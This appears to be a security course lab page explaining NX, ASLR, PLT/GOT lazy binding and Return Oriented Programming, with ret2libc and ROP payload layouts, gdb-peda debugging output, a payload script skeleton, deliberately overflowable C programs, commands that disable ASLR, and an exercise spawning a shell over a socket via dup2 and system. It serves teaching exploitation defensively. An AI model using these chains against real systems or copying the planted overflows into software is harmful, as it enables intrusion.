This is an old revision of the document!
The executable space protection is an instance of the principle of least privilege, which is applied in many security sensitive domains. In this case, the executable space protection is used to limit the types of memory access that a process is allowed to make during execution. A memory region (i.e., page) can have the following protection levels: READ, WRITE, and EXECUTE. The executable space protection mandates that writable regions should not be executable at the same time.
The mechanism can be (and was) implemented in many different ways, the most common in Linux being:
NX bit: This is the easiest method, and involves an extra bit added to each page table entry that specifies if the memory page should be executable or not. This is current implementation in 64-bit processors where page table entries are 8-bytes wide.
Physical Address Extension (PAE): Besides the main feature that allows access to more than 4GB of memory, the PAE extension for 32-bit processor also adds a NX bit in its page table entries.
Emulation: The NX bit can be emulated on older (i.e., non-PAE) 32-bit processors by overloading the Supervisor bit (PaX PAGEEXEC), or by using the segmentation mechanism and splitting the address space in half (PaX SEGMEXEC).
There are of course other implementations in different hardening-oriented projects such as: OpenBSD W^X, Red Hat Exec Shield, PaX (which is now part of grsecurity), Windows Data Execution Prevention (DEP).
The Linux kernel provides support for managing memory protections in the mmap()
and mprotect()
syscalls. These syscalls are used by the loader to set protection levels for each segment it loads when running a binary. Of course, the same functions can also be used during execution.
mprotect()
and mmap()
to avoid resetting the permissions during execution. See MPROTECT. Note that grsecurity/PaX are patches to the kernel, and are not available in normal distributions. You have to compile your own kernel if you want to try them out.
Let's start by deactivating ASLR, which is going to be discussed in the following section of this tutorial, and only focus on the NX protection. We can do this in two ways, as told below:
To disable ASLR system-wide we use (root access is required):
~$ sudo bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space'
To create a shell with ASLR disabled (ASLR will also be disabled for future processes spawned from that shell), we use (root access is not required):
~$ setarch $(uname -m) -R /bin/bash
Let's first compile an extremely simple C application:
int main() { while (1); }
~$ CFLAGS='-m32 -O0' make hello
As presented in 0x03. Static Analysis, the ELF format contains flags for each segment that specify what permissions should be granted. You can use readelf -l hello
to dump all program headers for this binary.
Program Headers: Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align PHDR 0x000034 0x08048034 0x08048034 0x00120 0x00120 R E 0x4 INTERP 0x000154 0x08048154 0x08048154 0x00013 0x00013 R 0x1 [Requesting program interpreter: /lib/ld-linux.so.2] LOAD 0x000000 0x08048000 0x08048000 0x00568 0x00568 R E 0x1000 LOAD 0x000f08 0x08049f08 0x08049f08 0x00114 0x00118 RW 0x1000 DYNAMIC 0x000f14 0x08049f14 0x08049f14 0x000e8 0x000e8 RW 0x4 NOTE 0x000168 0x08048168 0x08048168 0x00044 0x00044 R 0x4 GNU_EH_FRAME 0x000490 0x08048490 0x08048490 0x0002c 0x0002c R 0x4 GNU_STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RW 0x10 GNU_RELRO 0x000f08 0x08049f08 0x08049f08 0x000f8 0x000f8 R 0x1 Section to Segment mapping: Segment Sections... 00 01 .interp 02 .interp .note.ABI-tag .note.gnu.build-id .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rel.dyn .rel.plt .init .plt .text .fini .rodata .eh_frame_hdr .eh_frame 03 .init_array .fini_array .jcr .dynamic .got .got.plt .data .bss 04 .dynamic 05 .note.ABI-tag .note.gnu.build-id 06 .eh_frame_hdr 07 08 .init_array .fini_array .jcr .dynamic .got
Check the Flg
column. For example, the first LOAD
segment contains .text
and is marked R E
, while the GNU_STACK
segment is marked RW
.
Next we are interested in seeing calls to mmap2()
and mprotect()
made by the loader. We are going to use the strace
tool for this, and directly execute the loader. You can check the path to the loader on your system using ldd hello
.
~$ strace -e mmap2,mprotect /lib/ld-linux.so.2 ./hello
[ Process PID=11198 runs in 32 bit mode. ] mmap2(0x8048000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0) = 0x8048000 mmap2(0x8049000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0) = 0x8049000 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xfffffffff7ffc000 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xfffffffff7ffa000 mmap2(NULL, 156324, PROT_READ, MAP_PRIVATE, 3, 0) = 0xfffffffff7fd3000 mmap2(NULL, 1763964, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xfffffffff7e24000 mmap2(0xf7fcd000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1a9000) = 0xfffffffff7fcd000 mmap2(0xf7fd0000, 10876, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xfffffffff7fd0000 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xfffffffff7e23000 mprotect(0xf7fcd000, 8192, PROT_READ) = 0 mprotect(0x8049000, 4096, PROT_READ) = 0 mprotect(0x56575000, 4096, PROT_READ) = 0
We can observe a PROT_READ|PROT_EXEC
mapping at address 0x8048000, followed by a PROT_READ|PROT_WRITE
at address 0x8049000 that is later changed to PROT_READ
for the first half (4096 bytes). The later allocation is the data segment, that should be writable. We can also see a bunch of allocations for segments belonging to dynamic libraries.
mmap
. Also, the heap will be extended on-demand as the application requires it.
We can dump all memory mappings of the still running process as follows:
~$ ps u | grep /lib/ld-linux.so.2 ... ~$ cat /proc/11198/maps
strace
process.
~$ cat /proc/11198/maps
08048000-08049000 r-xp 00000000 00:22 5769082 /home/vladum/sss/session10/hello 08049000-0804a000 r--p 00000000 00:22 5769082 /home/vladum/sss/session10/hello 0804a000-0804b000 rw-p 00001000 00:22 5769082 /home/vladum/sss/session10/hello 56555000-56575000 r-xp 00000000 08:05 827365 /lib/i386-linux-gnu/ld-2.19.so 56575000-56576000 r--p 0001f000 08:05 827365 /lib/i386-linux-gnu/ld-2.19.so 56576000-56577000 rw-p 00020000 08:05 827365 /lib/i386-linux-gnu/ld-2.19.so f7e23000-f7e24000 rw-p 00000000 00:00 0 f7e24000-f7fcd000 r-xp 00000000 08:05 823395 /lib/i386-linux-gnu/libc-2.19.so f7fcd000-f7fcf000 r--p 001a9000 08:05 823395 /lib/i386-linux-gnu/libc-2.19.so f7fcf000-f7fd0000 rw-p 001ab000 08:05 823395 /lib/i386-linux-gnu/libc-2.19.so f7fd0000-f7fd3000 rw-p 00000000 00:00 0 f7ffa000-f7ffd000 rw-p 00000000 00:00 0 f7ffd000-f7ffe000 r-xp 00000000 00:00 0 [vdso] fffdd000-ffffe000 rw-p 00000000 00:00 0 [stack]
ret-to-plt/libc. You can return to the .plt
section and call library function already linked. You can also call other library functions based on their known offsets. The latter approach assumes no ASLR (see next section), or the possibility of an information leak (will be discussed in the Information Leak session).
Return Oriented Programming (ROP). This is a generalization of the ret-to-* approach that makes use of existing code to execute almost anything. As this is probably one of the most common types of attacks, it will be discussed in depth in a future section.
mprotect(). If the application is using mprotect()
you can easily call it to modify the permissions and include PROT_EXEC
for the stack. You can also call this in a ret-to-libc
attack. You can also mmap
a completely new memory region and dump the shellcode there.
Address Space Layout Randomization (ASLR) is a security feature that maps different memory regions of an executable at random addresses. This prevents buffer overflow-based attacks that rely on known addresses such as the stack (for calling into shellcode), or dynamically linked libraries (for calling functions that were not already linked with the target binary). Usually, the sections that are randomly mapped are: the stack, the heap, the VDSO page, and the dynamic libraries. The code section can also be randomly mapped for PIE binaries.
/proc/sys/kernel/randomize_va_space
file. Writing 0, 1, or 2 to this will results in the following behaviors:Make sure you reactivate ASLR after the previous section of the tutorial, by one of the two options below.
If you disabled ASLR system-wide, re-enable it using (root access is required):
~$ sudo bash -c 'echo 2 > /proc/sys/kernel/randomize_va_space'
If you disabled ASLR at shell level, simply close the shell such as issuing the Ctrl+d
keyboard shortcut.
We can easily demonstrate the effects on shared libraries by running ldd
multiple times in a row on a binary such as /bin/ls
.
ASLR is not the only feature that prevents the compiler and the linker from solving some relocations before the binary is actually running. Shared libraries can also be combined in different ways, so the first time you actually know the address of a shared library is while the loader is running. The ASLR feature is orthogonal to this - the loader could choose to assign address to libraries in a round-robin fashion, or could use ASLR to assign them randomly.
Of course, we might be inclined to have the loader simply fix all relocations in the code section after it loaded the libraries, but this breaks the memory access protection of the .text
section, which should only be readable and executable.
To solve this problems we need another level of indirection: all memory accessed to symbols located in shared libraries will read the actual address from a table, called Global Offset Table (.got
), at runtime. The loader will populate this table. Note that this can work both for data accesses, as well as for function calls, however function calls are actually using a small stub (i.e., a few instructions) stored in the Procedure Linkage Table (.plt
).
The PLT is responsible of finding the shared library function address when it is first called (lazy binding), and writing it to a GOT entry. Note that the function pointers are stored in .got.plt
). The following calls use the pre-resolved address.
Let's take a quick look at the code generated for a shared library call. You can use any binary you like, we'll just show an example from one that simply calls puts()
.
~$ objdump -D -j .text -M intel hello | grep puts
80483e4: e8 07 ff ff ff call 80482f0 <puts@plt>
We can see that the .plt
section will start at address 0x080482e0
, right where the previous call will jump:
~$ readelf --sections hello
... [12] .plt PROGBITS 080482e0 0002e0 000040 04 AX 0 0 16 ...
Let's see how the code there looks like:
~$ objdump -D -j .plt -M intel hello | grep -A 3 '<puts@plt>'
080482f0 <puts@plt>: 80482f0: ff 25 00 a0 04 08 jmp DWORD PTR ds:0x804a000 80482f6: 68 00 00 00 00 push 0x0 80482fb: e9 e0 ff ff ff jmp 80482e0 <_init+0x30>
We see it jumping to a pointer stored at 0x804a000
in the data section. Let's check the binary relocations for that location:
~$ readelf --relocs hello
... Relocation section '.rel.plt' at offset 0x298 contains 3 entries: Offset Info Type Sym.Value Sym. Name 0804a000 00000107 R_386_JUMP_SLOT 00000000 puts ...
Ok, good, but what is actually stored at this address initially?
~$ objdump -s -M intel -j .got.plt --start-address=0x0804a000 hello
hello: file format elf32-i386 Contents of section .got.plt: 804a000 f6820408 06830408 16830408 ............
We recognize f6820408
(0x80482f6
) as being the next instruction in the puts@plt
stub that we disassembled above. Which then pushes 0 in the stack and calls 0x80482e0
. This is the call to the one-time resolver, and it looks like this:
~$ objdump -D -j .plt -M intel hello | grep -A 3 '080482e0'
080482e0 <puts@plt-0x10>: 80482e0: ff 35 f8 9f 04 08 push DWORD PTR ds:0x8049ff8 80482e6: ff 25 fc 9f 04 08 jmp DWORD PTR ds:0x8049ffc 80482ec: 00 00 add BYTE PTR [eax],al
0x8049ffc
, and what happens when this jumps there.
What's going on here? What's actually happening is lazy binding — by convention when the dynamic linker loads a library, it will put an identifier and resolution function into known places in the GOT. Therefore, what happens is roughly this: on the first call of a function, it falls through to call the default stub, it simply jumps to the next instruction. The identifier is pushed on the stack, the dynamic linker is called, which at that point has enough information to figure out “hey, this program is trying to find the function foo”. It will go ahead and find it, and then patch the address into the GOT such that the next time the original PLT entry is called, it will load the actual address of the function, rather than the lookup stub. Ingenious!
In the previous sessions we discussed ret2libc
attacks. The standard attack was to overwrite in the following way:
RET + 0x00: addr of system RET + 0x04: JUNK RET + 0x08: address to desired command (e.g. '/bin/sh')
However, what happens when you need to call multiple functions? Say you need to call f1() and then f2(0xAB, 0xCD)? The payload should be:
RET + 0x00: addr of f1 RET + 0x04: addr of f2 (return address after f1 finishes) RET + 0x08: JUNK (return address after f2 finishes: we don't care about what happens after the 2 functions are called) RET + 0x0c: 0xAB (param1 of f2) RET + 0x10: 0xCD (param2 of f2)
What about if we need to call f1(0xAB, 0xCD) and then f2(0xEF, 0x42) ?
RET + 0x00: addr of f1 RET + 0x04: addr of f2 (return address after f1 finishes) RET + 0x08: 0xAB (param1 of f1) RET + 0x0c: 0xCD (param2 of f1) but this should also be 0xEF (param1 of f2) RET + 0x10: 0x42 (param2 of f2)
This kind of conflict can be resolved using Return Oriented Programming, a generalization of ret2libc
attacks.
While ret2libc
uses functions directly, Return Oriented Programming uses a finer level of code execution: instruction groups. Let's explore an example:
int main() { char a[16]; read(0, a, 100); return 0; }
This code obviously suffers from a stack buffer overflow. The offset to the return address is 28. So dwords from offset 28 onwards will be popped from the stack and executed. Remember the NOP sled concept from previous sessions? These were long chains of NOP instructions (“\x90”) used to pad a payload for alignment purposes. Since we can't add any new code to the program (NX is enabled) how could we simulate the effect of a NOP sled? Easy! Using return instructions!
# objdump -d a -M intel | grep $'\t'ret 80482dd: c3 ret 804837a: c3 ret 80483b7: c3 ret 8048437: c3 ret 8048444: c3 ret 80484a9: c3 ret 80484ad: c3 ret 80484c6: c3 ret
Any and all of these addresses will be ok. The payload could be the following:
RET + 0x00: 0x80482dd RET + 0x04: 0x80482dd RET + 0x08: 0x80482dd RET + 0x0c: 0x80482dd RET + 0x10: 0x80482dd .....
The original ret (in the normal code flow) will pop RET+0x00 off the stack and jump to it. When it gets popped the stack is automatically increased by 4 (on to the next value). The instruction at 0x80482dd
is another ret
which does the same thing as before. This goes on until another address is popped off the stack that is not a ret
.
That payload is not the only option. We don't really care which ret
we pick. The payload could very well look like this:
RET + 0x00: 0x80482dd RET + 0x04: 0x804837a RET + 0x08: 0x80483b7 RET + 0x0c: 0x8048437 RET + 0x10: 0x80484c6 .....
Notice the addresses are different but because they all point to a ret
instruction they will all have the same net effect on the code flow.
#!/usr/bin/python import struct, sys def dw(i): return struct.pack("<I", i) #TODO update count for your prog pad_count_to_ret = 100 payload = "X" * pad_count_to_ret #TODO figure out the rop chain payload += dw(0xcafebeef) payload += dw(0xdeadc0de) sys.stdout.write(payload)
Now that we have a sort of neutral primitive equivalent to a NOP let's actually do something useful. The building blocks of ROP payloads are called gadgets. These are blocks of instructions that end with a 'ret' instruction. Here are some 'gadgets' from the previous program:
0x8048443: pop ebp; ret 0x80484a7: pop edi; pop ebp; ret 0x8048441: mov ebp,esp; pop ebp; ret 0x80482da: pop eax; pop ebx; leave; ret 0x80484c3: pop ecx; pop ebx; leave; ret
By carefully stitching such gadgets on the stack we can bring code execution to almost any context we want. As an example let's say we would like to load 0x41424344 into eax and 0x61626364 into ebx. The payload should look like:
RET + 0x00: 0x80482da (pop eax; pop ebx; leave; ret) RET + 0x04: 0x41424344 RET + 0x08: 0x61626364 RET + 0x0c: 0xAABBCCDD ???
pop eax
0x41424344 is loaded into eax and the stack is increasedpop ebx
0x61626364 is loaded into ebx and the stack is increased againleave
two things actually happen: “mov esp, ebp; pop ebp”. So the stack frame is decreased to the previous one (pointed by ebp) and ebp is updated to the one before that. So esp will now be the old ebp+4ret
code flow will go to the instruction pointed to by ebp+4. This implies that execution will not go to 0xAABBCCDD but to some other address that may or may not be in our control (depending on how much we can overflow on the stack). If it is in our control we can overwrite that address with the rest of the ROP chain.We have now seen how gadgets can be useful if we want the CPU to achieve a certain state. This is particularly useful on other architectures such as ARM and x86_64 where functions do not take parameters from the stack but from registers. As an example, if we want to call f1(0xAB, 0xCD, 0xEF) on x86_64 we first need to know the calling convention for the first three parameters:
Next we would need gadgets for each. Let's assume these 2 scenarios: Scenario 1:
0x400124: pop rdi; pop rsi; ret 0x400235: pop rdx; ret 0x400440: f1() Payload: RET + 0x00: 0x400124 RET + 0x08: val of RDI (0xAB) RET + 0x10: val of RSI (0xCD) RET + 0x18: 0x400235 RET + 0x20: val of RDX RET + 0x28: f1
Scenario 2:
0x400125: pop rdi; ret 0x400252: pop rsi; ret 0x400235: pop rdx; ret 0x400440: f1() Payload: RET + 0x00: 0x400125 RET + 0x08: val of RDI (0xAB) RET + 0x10: 0x400252 RET + 0x18: val of RSI (0xCD) RET + 0x20: 0x400235 RET + 0x28: val of RDX RET + 0x30: f1
Notice that because the architecture is 64 bits wide, the values on the stack are not dwords but qwords (quad words: 8 bytes wide)
The second use of gadgets is to clear the stack. Remember the issue we had in the Motivation section? Let's solve it using gadgets. We need to call f1(0xAB, 0xCD) and then f2(0xEF, 0x42). Our initial solution was:
RET + 0x00: addr of f1 RET + 0x04: addr of f2 (return address after f1 finishes) RET + 0x08: 0xAB (param1 of f1) RET + 0x0c: 0xCD (param2 of f1) but this should also be 0xEF (param1 of f2) RET + 0x10: 0x42 (param2 of f2)
The problem is that those parameters of f1 are getting in the way of calling f2. We need to find a pop pop ret gadget. The actual registers are not important.
RET + 0x00: addr of f1 RET + 0x04: addr of (pop eax, pop ebx, ret) RET + 0x08: 0xAB (param1 of f1) RET + 0x0c: 0xCD (param2 of f1) RET + 0x10: addr of f2 RET + 0x14: JUNK RET + 0x18: 0xEF (param1 of f2) RET + 0x1c: 0x42 (param2 of f2)
Now we can even call the next function f3 if we repeat the trick:
RET + 0x00: addr of f1 RET + 0x04: addr of (pop eax, pop ebx, ret) RET + 0x08: 0xAB (param1 of f1) RET + 0x0c: 0xCD (param2 of f1) RET + 0x10: addr of f2 RET + 0x14: addr of (pop eax, pop ebx, ret) RET + 0x18: 0xEF (param1 of f2) RET + 0x1c: 0x42 (param2 of f2) RET + 0x20: addr of f3
Let's take the following prog:
int main() { int x, y ,z; char a,b,c; char buf[23]; read(0, buf, 100); return 0; }
A fairly simple overflow, right? How fast can you figure out the offset to the return address? How much padding do you need ? There is a shortcut that you can use to figure this out in under 30 seconds without looking at the assembly.
A De Bruijn sequence is a string of symbols out of a given alphabet in which each consecutive K symbols only appear once in the whole string. If we can construct such a string out of printable characters then we only need to know the Segmentation Fault address. Converting it back to 4 bytes and searching for it in the initial string will give us the exact offset to the return address.
Peda can help you do this. Here's how:
gdb-peda$ help pattern_create Generate a cyclic pattern Usage: pattern_create size [file] gdb-peda$ pattern_create 100 'AAAaAA0AABAAbAA1AACAAcAA2AADAAdAA3AAEAAeAA4AAFAAfAA5AAGAAgAA6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl' gdb-peda$ help pattern_offset Search for offset of a value in cyclic pattern Usage: pattern_offset value gdb-peda$ pattern_offset AA8A AA8A found at offset: 76
Things can even get more complex: if you insert such patterns as input to the program you can search for signs of where it got placed using peda. Here's how to figure out the offset to the return address in 3 commands for the previous program as promised:
# gdb -q ./a Reading symbols from ./a...(no debugging symbols found)...done. gdb-peda$ pattern_create 200 'AAAaAA0AABAAbAA1AACAAcAA2AADAAdAA3AAEAAeAA4AAFAAfAA5AAGAAgAA6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAlAAMAAmAANAAnAAOAAoAAPAApAAQAAqAARAArAASAAsAATAAtAAUAAuAAVAAvAAWAAwAAXAAxAAYAAyAAZAAzAaaAa0AaBAabAa1A' gdb-peda$ run AAAaAA0AABAAbAA1AACAAcAA2AADAAdAA3AAEAAeAA4AAFAAfAA5AAGAAgAA6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAlAAMAAmAANAAnAAOAAoAAPAApAAQAAqAARAArAASAAsAATAAtAAUAAuAAVAAvAAWAAwAAXAAxAAYAAyAAZAAzAaaAa0AaBAabAa1A Program received signal SIGSEGV, Segmentation fault. [----------------------------------registers-----------------------------------] EAX: 0x0 EBX: 0xf7f97e54 --> 0x1a6d5c ECX: 0xffffcd49 ("AAAaAA0AABAAbAA1AACAAcAA2AADAAdAA3AAEAAeAA4AAFAAfAA5AAGAAgAA6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl") EDX: 0x64 ('d') ESI: 0x0 EDI: 0x0 EBP: 0x41334141 ('AA3A') ESP: 0xffffcd70 ("eAA4AAFAAfAA5AAGAAgAA6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl") EIP: 0x41414541 ('AEAA') EFLAGS: 0x10207 (CARRY PARITY adjust zero sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] Invalid $PC address: 0x41414541 [------------------------------------stack-------------------------------------] 0000| 0xffffcd70 ("eAA4AAFAAfAA5AAGAAgAA6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl") 0004| 0xffffcd74 ("AAFAAfAA5AAGAAgAA6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl") 0008| 0xffffcd78 ("AfAA5AAGAAgAA6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl") 0012| 0xffffcd7c ("5AAGAAgAA6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl") 0016| 0xffffcd80 ("AAgAA6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl") 0020| 0xffffcd84 ("A6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl") 0024| 0xffffcd88 ("HAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl") 0028| 0xffffcd8c ("AA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl") 0032| 0xffffcd90 ("AIAAiAA8AAJAAjAA9AAKAAkAALAAl") 0036| 0xffffcd94 ("iAA8AAJAAjAA9AAKAAkAALAAl") 0040| 0xffffcd98 ("AAJAAjAA9AAKAAkAALAAl") 0044| 0xffffcd9c ("AjAA9AAKAAkAALAAl") 0048| 0xffffcda0 ("9AAKAAkAALAAl") 0052| 0xffffcda4 ("AAkAALAAl") 0056| 0xffffcda8 ("ALAAl") 0060| 0xffffcdac --> 0x6c ('l') [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV 0x41414541 in ?? () gdb-peda$ pattern_search Registers contain pattern buffer: EIP+0 found at offset: 35 EBP+0 found at offset: 31 Registers point to pattern buffer: [ECX] --> offset 0 - size ~100 [ESP] --> offset 39 - size ~61 Pattern buffer found at: 0xffffcd49 : offset 0 - size 100 ($sp + -0x27 [-10 dwords]) 0xffffd1c6 : offset 23424 - size 4 ($sp + 0x456 [277 dwords]) 0xffffd1d8 : offset 22930 - size 4 ($sp + 0x468 [282 dwords]) 0xffffd276 : offset 48535 - size 4 ($sp + 0x506 [321 dwords]) References to pattern buffer found at: 0xffffcd20 : 0xffffcd49 ($sp + -0x50 [-20 dwords]) 0xffffcd34 : 0xffffcd49 ($sp + -0x3c [-15 dwords])
As you can see from above, the base pointer gets trashed so backtracing is not possible
gdb-peda$ bt #0 0x41414541 in ?? () #1 0x34414165 in ?? () #2 0x41464141 in ?? () #3 0x41416641 in ?? ()
If this program was larger you wouldn't know which “ret” is the last one executed before jumping into the payload. You can set a breakpoint on all declared functions (if the program has not been stripped) using rbreak and then ignoring them:
gdb-peda$ rbreak Breakpoint 1 at 0x80482d4 <function, no debug info> _init; Breakpoint 2 at 0x8048310 <function, no debug info> read@plt; Breakpoint 3 at 0x8048320 <function, no debug info> __gmon_start__@plt; Breakpoint 4 at 0x8048330 <function, no debug info> __libc_start_main@plt; Breakpoint 5 at 0x8048340 <function, no debug info> _start; Breakpoint 6 at 0x8048370 <function, no debug info> __x86.get_pc_thunk.bx; Breakpoint 7 at 0x804843f <function, no debug info> main; Breakpoint 8 at 0x8048470 <function, no debug info> __libc_csu_init; Breakpoint 9 at 0x80484e0 <function, no debug info> __libc_csu_fini; Breakpoint 10 at 0x80484e4 <function, no debug info> _fini; gdb-peda$ commands Type commands for breakpoint(s) 1-10, one per line. End with a line saying just "end". >continue >end gdb-peda$ run Starting program: /ctf/Hexcellents/summerschool2014/lab_material/session-12/tut1/a warning: the debug information found in "/usr/lib64/debug/lib64/ld-2.17.so.debug" does not match "/lib/ld-linux.so.2" (CRC mismatch). warning: Could not load shared library symbols for linux-gate.so.1. Do you need "set solib-search-path" or "set sysroot"? Breakpoint 4, 0x08048330 in __libc_start_main@plt () Breakpoint 8, 0x08048470 in __libc_csu_init () Breakpoint 6, 0x08048370 in __x86.get_pc_thunk.bx () Breakpoint 1, 0x080482d4 in _init () Breakpoint 6, 0x08048370 in __x86.get_pc_thunk.bx () Breakpoint 7, 0x0804843f in main () Breakpoint 2, 0x08048310 in read@plt () AAAaAA0AABAAbAA1AACAAcAA2AADAAdAA3AAEAAeAA4AAFAAfAA5AAGAAgAA6AAHAAhAA7 Program received signal SIGSEGV, Segmentation fault. 0x41414541 in ?? ()
When you know what the offending function is, disassemble it and break on “ret”
gdb-peda$ pdis main Dump of assembler code for function main: 0x0804843c <+0>: push ebp 0x0804843d <+1>: mov ebp,esp 0x0804843f <+3>: and esp,0xfffffff0 0x08048442 <+6>: sub esp,0x30 0x08048445 <+9>: mov DWORD PTR [esp+0x8],0x64 0x0804844d <+17>: lea eax,[esp+0x19] 0x08048451 <+21>: mov DWORD PTR [esp+0x4],eax 0x08048455 <+25>: mov DWORD PTR [esp],0x0 0x0804845c <+32>: call 0x8048310 <read@plt> 0x08048461 <+37>: mov eax,0x0 0x08048466 <+42>: leave 0x08048467 <+43>: ret End of assembler dump. gdb-peda$ b *0x08048467 Breakpoint 1 at 0x8048467 AAAaAA0AABAAbAA1AACAAcAA2AADAAdAA3AAEAAeAA4AAFAAfA [----------------------------------registers-----------------------------------] EAX: 0x0 EBX: 0xf7f97e54 --> 0x1a6d5c ECX: 0xffffcd49 ("AAAaAA0AABAAbAA1AACAAcAA2AADAAdAA3AAEAAeAA4AAFAAfA\n\300\317\377\367\034") EDX: 0x64 ('d') ESI: 0x0 EDI: 0x0 EBP: 0x41334141 ('AA3A') ESP: 0xffffcd6c ("AEAAeAA4AAFAAfA\n\300\317\377\367\034") EIP: 0x8048467 (<main+43>: ret) EFLAGS: 0x203 (CARRY parity adjust zero sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x8048445 <main+9>: mov DWORD PTR [esp+0x8],0x64 0x804844d <main+17>: lea eax,[esp+0x19] 0x8048451 <main+21>: mov DWORD PTR [esp+0x4],eax 0x8048455 <main+25>: mov DWORD PTR [esp],0x0 0x804845c <main+32>: call 0x8048310 <read@plt> 0x8048461 <main+37>: mov eax,0x0 0x8048466 <main+42>: leave => 0x8048467 <main+43>: ret 0x8048468: xchg ax,ax 0x804846a: xchg ax,ax 0x804846c: xchg ax,ax 0x804846e: xchg ax,ax 0x8048470 <__libc_csu_init>: push ebp 0x8048471 <__libc_csu_init+1>: push edi 0x8048472 <__libc_csu_init+2>: xor edi,edi 0x8048474 <__libc_csu_init+4>: push esi [------------------------------------stack-------------------------------------] 0000| 0xffffcd6c --> 0xf7e333e0 (<system>: sub esp,0x1c) 0004| 0xffffcd70 --> 0x80484cf (<__libc_csu_init+95>: pop ebp) 0008| 0xffffcd74 --> 0xf7f56be6 ("/bin/sh") 0012| 0xffffcd78 --> 0xf7e25c00 (<exit>: push ebx) gdb-peda$ patto AEAAeAA4AAFAAfA AEAAeAA4AAFAAfA found at offset: 35
Then you can break on all called functions or step as needed to see if the payload is doing what you want it to.
gdb-peda$ checksec
CANARY : disabled
FORTIFY : disabled
NX : ENABLED
PIE : disabled
RELRO : Partial
Apart from objdump which only finds aligned instructions, you can also use dumprop in peda to find all gadgets in a memory region or mapping:
gdb-peda$ start .... gdb-peda$ dumprop Warning: this can be very slow, do not run for large memory range Writing ROP gadgets to file: a-rop.txt ... 0x8048467: ret 0x804835d: iret 0x804838f: repz ret 0x80483be: ret 0xeac1 0x80483a9: leave; ret 0x80485b4: inc ecx; ret 0x80484cf: pop ebp; ret 0x80482f5: pop ebx; ret 0x80484df: nop; repz ret 0x80483a8: ror cl,1; ret 0x804838e: add dh,bl; ret 0x80483e5: ror cl,cl; ret 0x8048465: add cl,cl; ret 0x804840b: leave; repz ret 0x8048371: sbb al,0x24; ret 0x80485b3: adc al,0x41; ret 0x8048370: mov ebx,[esp]; ret 0x80484de: nop; nop; repz ret 0x80483a7: call eax; leave; ret 0x80483e4: call edx; leave; ret 0x804840a: add ecx,ecx; repz ret 0x80484ce: pop edi; pop ebp; ret
Something finer is:
gdb-peda$ asmsearch "pop ? ; ret" 0x080482f5 : (5bc3) pop ebx; ret 0x080484cf : (5dc3) pop ebp; ret 0x080484f6 : (5bc3) pop ebx; ret gdb-peda$ asmsearch "pop ? ; pop ? ; ret" 0x080484ce : (5f5dc3) pop edi; pop ebp; ret gdb-peda$ asmsearch "call ?" 0x080483a7 : (ffd0) call eax 0x080483e4 : (ffd2) call edx 0x0804842f : (ffd0) call eax
There can be various annoyances in binaries: ptrace calls for anti-debugging, sleep calls to prevent bruteforcing or fork calls to use child processes to serve requests. These can all be deactivated using unptrace (for ptrace) and deactive in peda.
This task requires you to construct a payload using gadgets and calling the functions inside such that it will print
Hello! stage A!stage B!
Make it also print the messages in reverse order:
Hello! stage B!stage A!
This task is a network service that can be exploited. Run it locally and try to exploit it. You'll find that if you call system(“/bin/sh”) the shell is opened in the terminal where the server was started instead of the one where the attack takes place. This happens because the client-server communication takes place over a socket. When you spawn a shell it will inherit the Standard I/O descriptors from the parent and use those. To fix this you need to redirect the socket fd into 0,1 (and optionally 2).
So you will need to do the equivalent of the following in a ROP chain:
dup2(sockfd, 1); dup2(sockfd, 0); system("/bin/sh");
Exploit it first with ASLR disabled and then enabled.